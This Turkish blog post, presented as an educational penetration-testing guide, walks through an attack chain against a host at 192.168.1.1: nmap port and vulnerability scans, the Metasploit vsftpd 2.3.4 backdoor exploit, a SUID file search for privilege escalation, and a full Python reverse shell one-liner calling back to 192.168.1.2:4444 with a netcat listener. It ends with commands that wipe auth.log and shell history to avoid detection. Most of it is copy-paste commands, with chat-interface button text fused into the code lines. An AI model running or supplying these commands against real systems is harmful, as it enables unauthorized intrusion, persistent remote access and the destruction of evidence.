Penetrasyon Testi için Adımlar (Eğitim Amaçlı)

📌 1. Bilgi Toplama (Reconnaissance)

Bu aşamada hedef hakkında bilgi toplanır. Örneğin, Nmap kullanarak bir sistemin açık portlarını tarayalım.

🔹 Nmap ile Açık Port Tarama (Aktif Bilgi Toplama)

bashKopyalaDüzenlenmap -sS -Pn -T4 -p- 192.168.1.1

Bu komut:
SYN taraması yapar
Tüm portları tarar
Açık portları ve servisleri listeler


📌 2. Zafiyet Analizi

Açık portlardan birinde çalışan servislerde zafiyet olup olmadığını kontrol edelim.

🔹 Nmap ile Servis Tespiti ve Zafiyet Tarama

bashKopyalaDüzenlenmap -sV --script=vuln 192.168.1.1

Bu komut, hedef sistemde çalışan servisleri tespit eder ve varsa CVE açıklarını listeler.


📌 3. Exploitation (İstismar)

Hedefte bulunan bir FTP servisini (vsftpd 2.3.4) exploit etmek için Metasploit Framework kullanabiliriz.

🔹 Metasploit ile Exploit Çalıştırma

bashKopyalaDüzenlemsfconsole
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.1.1
exploit

Bu komut ile arka kapı (backdoor) açılır ve sisteme uzaktan bağlanma imkanı elde edilir.


📌 4. Yetki Yükseltme (Privilege Escalation)

Sisteme bağlandıktan sonra yetki yükseltme işlemi yapabiliriz.

🔹 Linux’ta SUID Biten Dosyaları Bulma (Yetki Yükseltme Öncesi)

bashKopyalaDüzenlefind / -perm -4000 2>/dev/null

Bu komut, SUID biti aktif olan dosyaları listeler. Örneğin, /bin/bash dosyası varsa, root yetkisine sahip olabiliriz.


📌 5. Kalıcı Erişim Sağlama

Yetki yükselttikten sonra kalıcı erişim sağlamak için bir reverse shell açabiliriz.

🔹 Python ile Reverse Shell Bağlantısı

Hedef sisteme şu komutu çalıştırarak saldırganın sistemine bağlantı açabiliriz:

bashKopyalaDüzenlepython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Bunun için saldırgan tarafında nc dinleyici açmalıyız:

bashKopyalaDüzenlenc -lvp 4444

Bağlantı sağlandığında hacker, hedef makinede shell elde eder.


📌 6. Logları Silme ve Raporlama

Tespit edilmemek için sistem loglarını temizleme işlemi yapılabilir.

🔹 Linux Log Temizleme

bashKopyalaDüzenleecho "" > /var/log/auth.log
history -c

Bu komut, yetkisiz erişim izlerini kaldırır.


📌 Akış Diyagramı

Pentest sürecinin temel akışını aşağıdaki gibi görselleştirebiliriz:

plaintextKopyalaDüzenle        Başlangıç
            |
            ▼
   📡 Bilgi Toplama
   (Nmap, Recon-ng)
            |
            ▼
 🔍 Zafiyet Tespiti
   (Exploit-DB, CVE)
            |
            ▼
 💣 Exploitation
   (Metasploit, RCE)
            |
            ▼
 🚀 Yetki Yükseltme
   (Privilege Escalation)
            |
            ▼
 🔒 Kalıcı Erişim
   (Reverse Shell)
            |
            ▼
 📊 Raporlama ve Log Temizleme
            |
            ▼
        Bitiş ✅
  • Gönderiler/Makaleler/Tezler

    İsrail Hava Savunma Sistemi: Iron Dome (Kippat Barzel / Demir Kubbe)

    Kısa özet Iron Dome, kısa menzilli roket, topçu mühimmatı ve havadan gelen benzer tehditleri (kısa menzilli füzeler, bazı dronlar ve havan/topçu mermileri) tespit edip, tehdit oluşturdukları sivil veya stratejik alanlara…

    Operasyonel Mükemmelliğe Giden Yol: Endüstri Mühendisliğinin Temel Prensipleri ve Araçları

    Özet Küresel rekabetin yoğunlaştığı günümüzde, organizasyonların sürdürülebilir başarı elde etmesi için operasyonel mükemmellik kritik bir stratejik hedef haline gelmiştir. Operasyonel mükemmellik, yalnızca maliyet düşürme değil; kaliteyi, verimliliği, esnekliği ve müşteri…

    Bir yanıt yazın

    E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

    Neler Kaçırdın?

    İsrail Hava Savunma Sistemi: Iron Dome (Kippat Barzel / Demir Kubbe)

    • By admin
    • Eylül 11, 2025
    • 22 views
    İsrail Hava Savunma Sistemi: Iron Dome (Kippat Barzel / Demir Kubbe)

    Operasyonel Mükemmelliğe Giden Yol: Endüstri Mühendisliğinin Temel Prensipleri ve Araçları

    • By admin
    • Eylül 9, 2025
    • 24 views
    Operasyonel Mükemmelliğe Giden Yol: Endüstri Mühendisliğinin Temel Prensipleri ve Araçları

    Senaryo: Siber Yolla İHA/SİHA’ların Ele Geçirilmesi – En Kötü Durum Analizi

    • By admin
    • Eylül 7, 2025
    • 27 views
    Senaryo: Siber Yolla İHA/SİHA’ların Ele Geçirilmesi – En Kötü Durum Analizi

    ABD Siber İstihbarat Oluşumları

    • By admin
    • Eylül 7, 2025
    • 23 views
    ABD Siber İstihbarat Oluşumları

    Temel İstihbarat ve Uluslararası İlişkilerSiber Çağda Bilgi ve Güvenlik (KİTABI)

    • By admin
    • Temmuz 18, 2025
    • 172 views
    Temel İstihbarat ve Uluslararası İlişkilerSiber Çağda Bilgi ve Güvenlik (KİTABI)

    ISP Log Management and Deletion Methods from Servers: Technical Guide and Application Handbook

    • By admin
    • Temmuz 12, 2025
    • 110 views
    ISP Log Management and Deletion Methods from Servers: Technical Guide and Application Handbook